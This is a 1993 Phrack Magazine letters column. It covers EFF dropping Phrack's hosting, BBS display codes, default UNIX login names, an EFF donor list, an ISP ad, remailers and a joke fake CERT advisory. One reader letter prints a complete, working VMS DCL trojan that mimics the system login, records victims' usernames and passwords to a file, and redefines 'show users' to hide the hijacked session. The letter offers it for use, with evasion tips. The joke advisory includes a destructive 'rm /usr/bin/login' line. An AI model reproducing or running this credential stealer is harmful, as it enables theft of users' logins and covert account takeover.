Title : Phrack Loopback Part I
Author : Phrack Staff
==Phrack Magazine==
Volume Four, Issue Forty-Three, File 2 of 27
Phrack Loopback
Part I
****************************************************************************
COMING NEXT ISSUE
Van Eck Info (Theory & Practice)
More Cellular (Monitoring Reverse Channel, Broadcasting, Reprogramming)
HUGE University Dialup List (Mail Us YOUR School's Dialup NOW!)
Neato Plans For Evil Devices
Gail Thackeray Gifs
*********************************** M A I L *********************************
Chris,
Craig Neidorf gave me these addresses as ways to reach you. He tells me
that you are currently editing Phrack. I hope you are well.
Recently the EFF sysadmins, Chris Davis and Helen Rose, informed me that
eff.org was using so much of its T-1 bandwidth that UUNET, who supplies our
IUP connection, was charging us an extra $1,000 per month. They did some
investigation at my request. We determined that Phrack traffic alone was
responsible for over 40% of the total bytes transferred from the site over
the past year or so. This is several gigabytes per month. All in all, the
CuD archive, which contains Phrack, CuD, and other publications accounts
for 85% of our total traffic. All of the email to and from EFF, Usenet
traffic, and other FTP (from the EFF archive, the CAF archive, and others)
constitutes about 15%.
EFF isn't going to be able to carry it any more because it is effectively
costing us $1,000 per month. The fundamental problem is that Phrack is so
popular (at least as a free good) to cause real expense in transmission
costs. Ultimately the users are going to have to pay the costs because
bandwidth (when measures in gigabytes anyway) isn't free. The 12K per
year it costs us to carry Phrack is not something which EFF can justify in
its budget. I'm sure you can understand this.
On July 1, eff.org moves from Cambridge to Washington, DC which is when I
expect we will stop carrying it. I wanted to raise this issue now to let
you know in advance of this happening.
I have also asked Chris and Helen to talk to Brendan Kehoe, who actually
maintains the archive, to see whether there is anything we can do to help
find another site for Phrack or make any other arrangement which will
result in less loss of service.
Mitch
------------------------------------------------------------------------------
Mitchell Kapor, Electronic Frontier Foundation
Note permanent new email address for all correspondence as of 6/1/93
mkapor@kei.com
[Editor: Well, all things must come to an end. Looks like EFF's
move to Washington is leaving behind lots of bad
memories, and looking forward to a happy life in the hotbed
of American politics. We wish them good luck. We also
encourage everyone to join.........CPSR.
In all fairness, I did ask Mitch more detail about the
specifics of the cost, and he explained that EFF was paying
flat rate for a fractional T-1, and whenever they went over
their allotted bandwidth, they were billed above and beyond
the flat rate. Oh well. Thank GOD for Len Rose.
Phrack now has a new home at ftp.netsys.com.]
****************************************************************************
I'm having a really hard time finding a lead to the Information
America Network. I am writing you guys as a last resort. Could
you point me in the right direction? Maybe an access number or
something? Thanks you very much.
[Editor: You can reach Information America voice at 404-892-1800.
They will be more than happy to send you loads of info.]
****************************************************************************
To whom it may concern:
This is a submission to the next issue of phrack...thanks for the great
'zine!
----------------------------cut here-------------------------------
Greetings Furds:
Have you ever wanted to impress one of those BBS-babes with your astounding
knowledge of board tricks? Well *NOW* you can! Be the life of the party!
Gain and influence friends! Irritate SysOps! Attain the worship and
admiration of your online pals. Searchlight BBS systems (like many other
software packages) have internal strings to display user information in
messages/posts and the like. They are as follows (tested on Searchlight BBS
System v2.25D):
\%A = displays user's access level
\%B = displays baud rate connected at
\%C = unknown
\%F = unknown
\%G = displays graphics status
\%K = displays user's first name
\%L = displays system time
\%M = displays user's time left on system
\%N = displays user's name in format: First Last
\%O = times left to call "today"
\%P = unknown
\%S = displays line/node number and BBS name
\%T = displays user's time limit
\%U = displays user's name in format: FIRST_LAST
All you gotta do is slam the string somewhere in the middle of a post or
something and the value will be inserted for the reader to see.
Example: Hey there chump, I mean \%K, you better you better UL or log
off of \%S...you leach too damn many files..you got \%M mins
left to upload some new porn GIFs or face bodily harm and
mutilation!.
----------------------------
Have phun!
Inf0rmati0n Surfer (& Dr. Cloakenstein)
SysOp Cranial Manifestations vBBS
[Editor: Ya know, once a LONG LONG time ago, I got on a BBS and
while reading messages noticed that a large amount of
messages seemed to be directed at ME!!# It took me
about 10 minutes to figure it out, but BOY WAS I MAD!
Then I added my own \%U message for the next hapless fool.
:) BIG FUN!]
****************************************************************************
-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-
SotMESC
The US SotMESC Chapter is offering
Scholarships for the 1993 school term.
Entries should be single-spaced paragraphs,
Double-spacing between paragraphs.
The subject should center on an aspect of the
Computer Culture and be between 20-30 pages long.
Send entries to:
SotMESC
PO Box 573
Long Beach, MS 39560
All entries submitted will become the property of the SotMESC
-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-
****************************************************************************
The Southwest Netrunner's League's
-----------------------------------------------------------------
WareZ RoDeNtZ Guide to UNIX!!!!
-----------------------------------------------------------------
Compiled by:The Technomancer (UNICOS,UNIX,VMS,and Amigas)
Assists by:SysCon XIV (The Ma'Bell Rapist)
Iron Man MK 4a (Things that make ya go boom)
This file begs to be folded, spindeled,and mutilated.
No Rights Reserved@1993
-----------------------------------------------------------------
Technomancer can be reached at: af604@FreeNet.hsc.colorado.edu
Coming this September.... Shadowland, 68020... Watch this space.
-----------------------------------------------------------------
Part I(Basic commands)
Phile Commands: ls=List Philes
more,page=Display Phile on Yo Terminal
cp=Copy Phile
mv=Move or Remove Philes
rm=Remove Philes
Editor Commnds: vi=Screen Editor
Dirtory cmmnds: dir=Prints Directory
mkdir=Makes a new Directory(also a VERY bad bug)
rmdir=Remove a Directory
pwd=print working directory
Misc. Commands: apropos=Locate commands by keyword lookup.
whatis=Display command description.
man=Displays manual pages online.
cal=Prints calendar
date=Prints the time and date.
who=Prints out every one who is logged in
(Well, almost everyone 7:^] )
---------------------------------------------------------------
Part II(Security(UNIX security, another OXYMORON 7:^] ))
If you are a useless wAReZ r0dEnT who wants to try to Netrun
a UNIX system, try these logins....
root
unmountsys
setup
makefsys
sysadm
powerdown
mountfsys
checkfsys
All I can help ya with on da passwords iz ta give you some
simple guidelines on how they are put together....
6-8 characters
6-8 characters
1 character is a special character (exmpl:# ! ' & *)
-----------------------------------------------------------------
Well thats all fo' now tune in next time, same Hack-time
same Hack-channel!!!
THE TECHNOMANCER I have taken all knowledge
af604@FreeNet.hsc.colorado.edu
to be my province
--
Technomancer
Southwest Netrunner's League
*****************************************************************
[Editor: This is an example of what NOT to send to Phrack.
This is probably the worst piece of garbage I've
received, so I had to print it. I can only hope
that it's a private joke that I just don't get.
Uh, please don't try to write something worse and
submit it hoping to have it singled out as the
next "worst," since I'll just ignore it.]
****************************************************************************
Dear Phrack,
I was looking through Phrack 42 and noticed the letters about password
stealers. It just so happened that the same day I had gotten extremely
busted for a program which was infinitely more indetectible. Such is life.
I got off pretty well being an innocent looking female so it's no biggie.
Anyway, I deleted the program the same day because all I could think was
"Shit, I'm fucked". I rewrote a new and improved version, and decided to
submit it. The basic advantages of this decoy are that a) there is no
login failure before the user enters his or her account, and b) the
program defines the show users command for the user so that when they
do show users, the fact that they are running out of another account
doesn't register on their screen.
There are a couple holes in this program that you should probably be
aware of. Neither of these can kick the user back into the account that
the program is running from, so that's no problem, but the program can
still be detected. (So basically, don't run it out of your own account...
except for maybe once...to get a new account to run it out of) First, once
the user has logged into their account (out of your program of course) hitting
control_y twice in a row will cause the terminal to inquire if they are
doing this to terminate the session on the remote node. Oops. It's really no
problem though, because most users wouldn't even know what this meant. The
other problem is that, if the user for some strange reason redefines show:
$show == ""
then the show users screen will no longer eliminate the fact that the account
is set host out of another. That's not a big deal either, however, because
not many people would sit around randomly deciding to redefine show.
The reason I was caught was that I (not even knowing the word "hacker"
until about a month ago) was dumb enough to let all my friends know about the
program and how it worked. The word got spread to redefine show, and that's
what happened. The decoy was caught and traced to me. Enough BS...here's the
program. Sorry...no UNIX...just VMS.
Lady Shade
I wrote the code...but I got so many ideas from my buddies:
Digital Sorcerer, Y.K.F.W., Techno-Pirate, Ephemereal Presence, and Black Ice
------------------------------------------------
$if p1 .eqs. "SHOW" then goto show
$sfile = ""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! The role of the dummy file in this program is to tell if the program !!!!
!!!! is being used as a decoy or as a substitute login for the victim. It !!!!
!!!! does not stay in your directory after program termination. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$sfile = f$search("sys$system:[ZJABAD_X]dummy.txt")
$if sfile .nes. "" then goto other
$open/write io user.dat
$close io
$open/write dummy instaar_device:[miller_g]dummy.txt
$close dummy
$wo == "write sys$output"
$line = ""
$user = ""
$pass = ""
$a$ = ""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! A login screen with a message informing someone of new mail wouldnt !!!!
!!!! be too cool... !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$set broadcast=nomail
$set message/noidenficitaion/noseverity/nofacility/notext
$on error then goto outer
$!on control_y then goto inner
$wo " [H [2J"
$wo ""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! insert a fake logout screen here !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$wo " ZJABAD_X logged out at ", f$time()
$wo " [2A"
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This is the main body of the program. It simulates the system login !!!!
!!!! screen. It also grabs the username and password and sticks them in !!!!
!!!! a file called user.dat !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$outer:
$set term/noecho
$inquire a$/nopun ""
$inquire a$/nopun ""
$set term/echo
$c = 0
$c1 = 0
$c2 = 0
$inner:
$c2 = c2 + 1
$if c2 .eqs. 5 then goto speedup
$c = c + 1
$if c .eqs. 15 then goto fail
$if c1 .eqs. 3 then goto fail3
$user = "a"
$wo "Username: "
$from_speedup:
$set term/uppercase
$wo " [2A"
$read/time_out=10/prompt=" [9C " sys$command user
$if user .eqs. "a" then goto timeout
$set term/nouppercase
$if user .eqs. "" then goto inner
$set term/noecho
$inquire pass "Password"
$set term/echo
$if user .eqs. "ME" then goto done
$if pass .eqs. "" then goto fail
$open/append io user.dat
$write io user + " " + pass
$close io
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Sends the user into their account !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$open/write io set.com
$write io "$set host 0"
$write io user + "/COMMAND=INSTAAR_DEVICE:[MILLER_G]FINDNEXT"
$write io pass
$close io
$@set
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Control has been returned to your account !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$write io " [2A"
$goto outer
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Simulates a failure if the password is null, and also if the !!!!
!!!! username prompt has cycled through 15 times... This is what !!!!
!!!! the system login screen does. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$fail:
$c = 1
$c1 = c1 + 1
$wo "User authorization failure"
$wo " [1A"
$goto inner
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! After the third failure, the system usually sends the screen back !!!!
!!!! one step...this just handles that. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$fail3:
$wo " [2A"
$goto outer
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! The system keeps a timeout check in the login. If a username is not !!!!
!!!! entered quickly enough, the timeout message is activated !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$timeout:
$set term/nouppercase
$wo "Error reading command input"
$wo "Timeout period expired"
$wo " [2A"
$goto outer
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! There is a feature in this program which sets the terminal to !!!!
!!!! uppercase for the input of a username. This is wonderful for !!!!
!!!! preventing program detection, but it does cause a problem. It slows !!!!
!!!! the screen down, which looks suspicious. So, in the case where a !!!!
!!!! user walks up tot he terminal and holds the return key down for a !!!!
!!!! bit before typing in their username, this section speeds up the run !!!!
!!!! considerably. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$speedup:
$set term/nouppercase
$fast_loop:
$user = "a"
$read/time_out=1/prompt="Username: " sys$command io
$if user .eqs. "a" then goto from_speedup
$goto fast_loop
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This section is optional. There are many ways that you can implement !!!!
!!!! to break out of the program when you think you have gotten enough !!!!
!!!! passwords. 1), you can sit down at the terminal and type in a string !!!!
!!!! for the username and pass which kicks you out. If this option is !!!!
!!!! implemented, you should at least put in something that looks like !!!!
!!!! you have just logged in, the program should not kick straight back !!!!
!!!! to your command level, but rather execute your login.com. 2) You !!!!
!!!! can log in to the account which is stealing the password from a !!!!
!!!! different terminal and stop the process on the account which is !!!!
!!!! running the program. This is much safer, and my recommandation. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$done:
$set broadcast=mail
$set message/facility/text/identification/severity
$delete dummy.txt;*
$exit
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This section is how one covers up the fact that the account which has !!!!
!!!! been stolen is running out of another. Basically, the area of the show!!!!
!!!! users screen which registers this is at the far right hand side. !!!!
!!!! This section first writes the show users data to a file and alters !!!!
!!!! it before it is written to the screen for viewing by the user. There !!!!
!!!! may exist many forms of the show users command in your system, and !!!!
!!!! you may have to handle each one differently. I have written only two !!!!
!!!! manipulations into this code to be used as an example. But looking !!!!
!!!! at how this is preformed should be enough to allow you to write your !!!!
!!!! own special cases. Notice that what happens to activate this section !!!!
!!!! of the program is the computer detects the word "show" and interprets !!!!
!!!! it as a procedure call. The words following show become variables !!!!
!!!! passed into the program as p1, p2, etc. in the order which they !!!!
!!!! were typed after the word show. Also, by incorporating a third data !!!!
!!!! file into the manipulations, one can extract the terminal id for the !!!!
!!!! account which the program is running out of and plug this into the !!!!
!!!! place where the user's line displays his or her terminal id. Doing !!!!
!!!! this is better that putting in a fake terminal id, but that is just a !!!!
!!!! minor detail. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$show:
$show = ""
$show$ = ""
$length = 0
$ch = ""
$full = 0
$c = 0
$if (f$extract(5,1,p2) .eqs. "/") .and. (f$extract(6,4,p2) .nes. "FULL") then show 'p1'
$if (p2 .eqs. "USERS/FULL") .and. (p3 .eqs. "") then goto ufull
$if p2 .eqs. "USERS" .and. p3 .eqs. "" then show users
$if p2 .eqs. "USERS" .and. p3 .eqs. "" then exit
$if p3 .eqs. "" then goto fallout
$goto full
$fallout:
$show 'p2' 'p3'
$exit
$ufull:
$show users/full/output=users.dat
$goto manipulate
$full:
$show$ = p3 + "/output=users.dat"
$show users 'show$'
$manipulate:
$set message/nofacility/noseverity/notext/noidentification
$open/read io1 users.dat
$open/write io2 users2.dat
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Control_y must be dealt with here. If the user did happen to controlY !!!
!!!! there is a chance that the files users.dat and users2.dat could be !!!
!!!! left in their directory. That is a bad thing as we are trying to !!!
!!!! prevent detection :) !!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$on control_y then goto aborted
$user = ""
$test = ""
$long = ""
$ch = ""
$length = 0
$user = f$user()
$length = f$length(user) - 2
$user = f$extract(1,length,user)
$read_loop:
$read/end_of_file=eof io1 line
$test = f$extract(1,length,line)
$ch = f$extract (length+1,1,line)
$if (test .eqs. user) .and. (ch .eqs. " ") then goto change
$from_change:
$write io2 line
$goto read_loop
$eof:
$close io1
$close io2
$type users2.dat
$del users.dat;*
$del users2.dat;*
$show == "@instaar_device:[MILLER_G]findnext show"
$set message/facility/text/severity/identification
$exit
$change:
$if f$extract(50,1,line) .nes. "" then line = f$extract(0,57,line) + "(FAKE TERMINAL INFO)"
$goto from_change
$aborted:
$!if f$search("users.dat") .nes. "" then close io1
$!if f$search("users.dat") .nes. "" then delete users.dat;*
$!if f$search("users2.dat") .nes. "" then close io2
$!if f$search("users2.dat") .nes. "" then delete users2.dat;*
$close io1
$close io2
$delete users.dat;*
$delete users2.dat;*
$show == "@instaar_device:[MILLER_G]findnext show"
$set message/facility/text/severity/identification
$exit
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This is the section of the program which is executed in place of the !!!!
!!!! users login.com. It does grab their login and execute it to prevent !!!!
!!!! suspicion, but there are a couple of hidden commands which are also !!!!
!!!! added. They redefine the show and sys commands so that the user can !!!!
!!!! not detect that he or she is riding off of another account. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$other:
$sh$ = "@instaar_device:[miller_g]findnext show"
$shline = "$sh*ow ==" + sh$
$logi = ""
$logi = f$search("login.com")
$if logi .NES. "" then goto Ylogin
$nologin:
$open/write io login2.com
$write io shline
$close io
$@login2
$delete login2.com;*
$exit
$ylogin:
$open/write io2 login2.com
$open/read io1 login.com
$transfer_loop:
$read/end_of_file=ready io1 line
$write io2 line
$goto transfer_loop
$ready:
$write io2 "$sh*ow == ""@instaar_device:[miller_g]findnext show""
$close io1
$close io2
$@login2
$delete login2.com;*
$exit
[Editor: Thanks for the letter and program. I wish I could bring
myself to use a VMS and try it out. :) Always happy
to get notice that somewhere out there a female reads
Phrack. By the way, "innocent female" is an oxymoron.]
****************************************************************************
To: Phrack Loopback.
From: White Crocodile.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Greetings sweet Phrack and Mr. Bloodaxe. Your "loopback reports" is
really cool invention and I (sorry for egoisthic "I") with pleasure
wasting time for his reading ( ex. my playboy time ). But here for
some unknown reason appear equal style, and all loopback remind
something medium between "relations search" [Hello Dear Phrack, I am
security expert of our local area, but when I looked to output of
"last" program (oh,yeah - "last" it is ...), I ocassionaly under -
standed what apparently someone elite hacker penetrated into my
unpassworded account! But how he knew it??? I need to talk
with him! Please mail me at security@...] and "make yourself" [Yep.I
totally wrote program which gets file listing from target vicitim's
home directory in current host. After that I decided to contribute
it for You. I hope this will help. Here is the complete C code. "rx"
permission in target's '$HOME' required.].
Looking similar articles like "... off Geek!" and various reports
which don't reacheds PWN. [CENSORED BY ME].
Resulting from abovewritten reason and I let myself to add some
elite (oops word too complex), some bogus and little deposit to Your
lb. He written in classic plagiarize style.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
* * *
Good mornin' Ladys and Gentelmen! I hacking and phreaking. I know what
it is horrible (don't read it please - this message to Bart), but I
doing it all the time (today already 3 month). I have not much time to
write, and here is the subject - I broke into one military computer
and stole their mail about new security bug!!! l00k f3r |t:
- - -
DDN & CERT
SPECIAL REPORT*
Sun 3.x,4.1.x login flaw
Subject: The huge Sun 4.x login hole.(possibly Ulitix 3.0,BSD,AIX
and many yet unknown systems)
Impact: Allow random intruders to gain "root" access.
Description:
The huge security hole was there and waiting! Type:
$ login root
[ no option required ], and You are! All what You need to know its
just root's password, but it (pw), sure, can be easily obtained from
real root, by asking him (root). Ex - "$ talk root"
Possible fix until copyrighted patch come out:
#rm /usr/bin/login
#cp /usr/games/fortune /usr/bin/login
If you believe that your system has been compromised, contact CERT CC. Call
our hotline 900-FBI-PRIVATE (24 a day,please not in dinner time or in time
of "Silence of the Lamb"), leave Inet address of your system and number of
private credit card.
- - -
* Report not will be printed in cert advisories in this form, becouse FBI
need remove all hints and tips, and make him useless to intruders.
DISCLAIMER: Above document written by CERT, DDN and FBI -
all pretension to them.
Thanks to gr*k (I can't write his full name for security reasons),roxtar,
y0,Fidelio,2 scotts from Santafe,KL (He not have attitude towards this
mail,but I included him for polite since he reserved tickets for me to
SUMMERCON),ahh,x0d,all zero's (count,bob,nick,etc.) and many others for
hints to me, what this bug really exist (Yep, before I stoled report).
- Write You later - anonymous.
P.S. Yup! If You won't think what I am toady - I wanna say also thanks to TK
and sure Erik Bloodaxe. And also - IF after E911 incident you are more
carefully, feel free to replace "stole" to "got" (when you'll post it), and
do not forget to add "reprinted with permission".
- Sincerely, anonymous.
----------------------------------------------------------------------
[Editor: More indications that we will all be raided by the DEA
more often than the FBI in coming years.]
*****************************************************************************
"Since my probation status forces me to be adamant about this. Illegal
activities on Netsys cannot and will not be tolerated. Prison sucked."
- Len Rose
06/6/93
NETSYS COMMUNICATION SERVICES Palo Alto, California
Netsys is a network of large Sun servers dedicated to providing
Internet access to individuals and corporations that need solid,
reliable Internet connectivity. Netsys is at the hub of major
Internet connectivity.
Netsys is a system for professionals in both the Internet and Unix
community. The public image is important to us. Illegal activities
cannot be tolerated.
Netsys has every feature you could possibly need.
Netsys is lightly loaded, extremely reliable and dedicated to providing
full time 24 hour Internet access.
Support: 24 hour emergency response service.
Dialups: Palo Alto area, High Speed (V.32 and PEP)
Private Accounts: $20 monthly ( with file storage capacity of 5 megabytes)
$1 per megabyte per month over 5 megabytes.
Commercial Accounts: $40 monthly (file storage capacity of 10 megabytes)
$1 per megabyte per month over 10 megabytes.
Newsfeeds: We offer both nntp and uucp based newsfeeds , with all domestic
newsgroups, and including all foreign newsgroups.
SPECIAL FEATURES THAT NO ONE ELSE CAN PROVIDE
Satellite Weather: Netsys has available real time satellite weather
imagery. Images are available in gif, or Sun raster
format. Contact us for NFS mirroring, and other special
arrangement. These images are directly downlinked from
the GOES bird. Contact Steve Eigsti (steve@netsys.com)
Satellite Usenet: Netsys is offering Pagesat's satellite newsfeed service
for large volume news distribution. Members of Netsys
can obtain substantial discounts for the purchase and
service costs of this revolutionary method of Usenet news
distribution. Both Unix and MS Windows software available.
Contact (pagesat@pagesat.com) for product information.
Paging Services: Netsys is offering Pagesat's Internet to Pager mail service.
Members of Netsys can obtain critical email to pager
services. Pagesat has the ability to gateway any critical
electronic mail to your display pager.
Leased Line Internet Connections
Pagesat Inc. offers low cost 56k and T1 Internet connections all over the
United States. Since Pagesat is an FCC common carrier, our savings on
leased lines can be passed on to you. For further information, contact
Duane Dubay (djd@pagesat.com).
We offer other services such as creating domains, acting as MX
forwarders, and of course uucp based newsfeeds.
Netsys is now offering completely open shell access to Internet users.
For accounts, or more information , send mail to netsys@netsys.com
Netsys will NEVER accept more members than our capacity to serve.
Netsys prides itself on it's excellent connectivity (including multiple T1's,
and SMDS), lightly loaded systems, and it's clientele.
We're not your average Internet Service Provider. And it shows.
--------------------------------------------------------------------
[Editor: We here at Phrack are forever in debt to Mr. Len Rose for
allowing us to use ftp.netsys.com as our new official FTP
site after getting the boot off EFF. It takes a steel
set of huevos to let such an evil hacker publication
reside on your hard drive after serving time for having
dealings with evil hackers. We are STOKED! Thanks Len!
Netsys is not your average site, INDEED!]
****************************************************************************
Something Phrack might like to see:
The contributors to and practices of the Electronic Frontier Foundation
disclose quite accurately, just who this organization represents. We
challenge the legitimacy of the claim that this is a "public interest"
advocate. Here is a copy of their list of contributors:
[FINS requested the Office of the Attorney General of the Commonwealth of
Massachusetts to provide us with a list of contributors of over $5000, to
the Electronic Frontier Foundation, required by IRS Form 990. Timothy E.
Dowd, of the Division of Public Charities, provided us with a list (dated
January 21, 1993), containing the following information. No response was
given to a phone request by FINS directly to EFF, for permission to inspect
and copy the most current IRS Form 990 information.]
ELECTRONIC FRONTIER FOUNDATION, INC.
IRS FORM 990. PART I - LIST OF CONTRIBUTIONS
NAME AND ADDRESS OF CONTRIBUTOR CONTRIBUTION
DATE AMOUNT
Kapor Family Foundation
C/O Kapor Enterprises, Inc.
155 2nd Street
Cambridge, MA 02141 Var 100,000
Mitchell D. Kapor
450 Warren Street
Brookline, MA 02146 Var 324,000
Andrew Hertzfeld
370 Channing Avenue
Palo Alto, CA 94301 12/12/91 5,000
Dunn & Bradstreet
C/O Michael F. ...
1001 G Street, NW Suite 300 East
Washington, DC 20001 02/12/92 10,000
National Cable Television
1724 Massachusetts Avenue, NW
Washington, DC 20036 02/18/92 25,000
MCI Communications Corporation
1133 19th Street, NW
Washington, DC 20036 03/11/92 15,000
American Newspaper Publishers
Association
The Newspaper CTR
11600 Sunrise Valley
Reston, VA 22091 03/23/92 20,000
Apple Computer
20525 Mariani Avenue MS:75-61
Cupertino, CA 95014 03/23/92 50,000
Sun Microsystems, Inc
c/o Wayne Rosing
2550 Garcia Ave
Mountain View, CA 94043-1100 04/03/92 50,000
Adobe Systems, Inc.
c/o William Spaller
1585 Charlestown Road
Mountain View, CA 94039-7900 04/16/92 10,000
International Business Systems
c/o Robert Carbert, Rte 100
Somers, NY 10589 05/07/92 50,000
Prodigy Services Company
c/o G. Pera...
445 Hamilton Avenue
White Plains, NY 10601 05/07/92 10,000
Electronic Mail Associates
1555 Wilson Blvd. Suite 300
Arlington, VA 22209 05/13/92 10,000
Microsoft
c/o William H. Neukom
1 Microsoft Way
Redmond, VA 98052 06/25/92 50,000
David Winer
933 Hermosa Way
Menio Park, CA 94025 01/02/92 5,000
Ed Venture Holdings
c/o Ester Dvson
375 Park Avenue
New York, NY 10152 03/23/92 15,000
Anonymous 12/26/91 10,000
Bauman Fund
c/o Patricia Bauman
1731 Connecticut Avenue
Washington, DC 20009-1146 04/16/92 2,500
Capital Cities ABA
c/o Mark MacCarthy
2445 N. Street, NW Suite 48
Washington, DC 20037 05/04/92 1,000
John Gilmore
210 Clayton Street
San Francisco, CA 94117 07/23/91 1,488
08/06/91 100,000
Government Technology 10/08/91 1,000
Miscellaneous 04/03/91 120
Apple Writers Grant
c/o Apple Computer
20525 Mariani Avenue 01/10/92 15,000
[Editor: Well, hmmm. Tell you guys what: Send Phrack that
much money and we will give up our ideals and move to
a new location, and forget everything about what we
were all about in the beginning. In fact, we will turn
our backs on it. Fair?
I was talking about me moving to Europe and giving
up computers. Don't read anything else into that. Nope.]
****************************************************************************
-----BEGIN PGP SIGNED MESSAGE-----
Q1: What cypherpunk remailers exist?
A1:
1: hh@pmantis.berkeley.edu
2: hh@cicada.berkeley.edu
3: hh@soda.berkeley.edu
4: nowhere@bsu-cs.bsu.edu
5: remail@tamsun.tamu.edu
6: remail@tamaix.tamu.edu
7: ebrandt@jarthur.claremont.edu
8: hal@alumni.caltech.edu
9: remailer@rebma.mn.org
10: elee7h5@rosebud.ee.uh.edu
11: phantom@mead.u.washington.edu
12: hfinney@shell.portal.com
13: remailer@utter.dis.org
14: 00x@uclink.berkeley.edu
15: remail@extropia.wimsey.com
NOTES:
#1-#6 remail only, no encryption of headers
#7-#12 support encrypted headers
#15 special - header and message must be encrypted together
#9,#13,#15 introduce larger than average delay (not direct connect)
#14 public key not yet released
#9,#13,#15 running on privately owned machines
======================================================================
Q2: What help is available?
A2:
Check out the pub/cypherpunks directory at soda.berkeley.edu
(128.32.149.19). Instructions on how to use the remailers are in the
remailer directory, along with some unix scripts and dos batch files.
Mail to me (elee9sf@menudo.uh.edu) for further help and/or questions.
======================================================================
-----BEGIN PGP SIGNATURE-----
Version: 2.2
iQCVAgUBLAulOYOA7OpLWtYzAQHLfQP/XDSipOUPctZnqjjTq7+665MWgysE1ex9
lh3Umzk2Q647KyqhoCo8f7nVrieAZxK0HjRFrRQnQCwjTSQrve2eAQ1A5PmJjyiI
Y55E3YIXYmKrQekIHUKaMyATfnhNc6+2MT8mwaWz2kiOTRkun/SlNI3Cv3Qt8Emy
Y6Zv0kk/7rs=
=simY
-----END PGP SIGNATURE-----
[Editor: We suggest that everyone go ahead and get the info file from
soda.berkeley.edu's ftp site. While you are there,
take a look around. Lots of groovy free stuff.]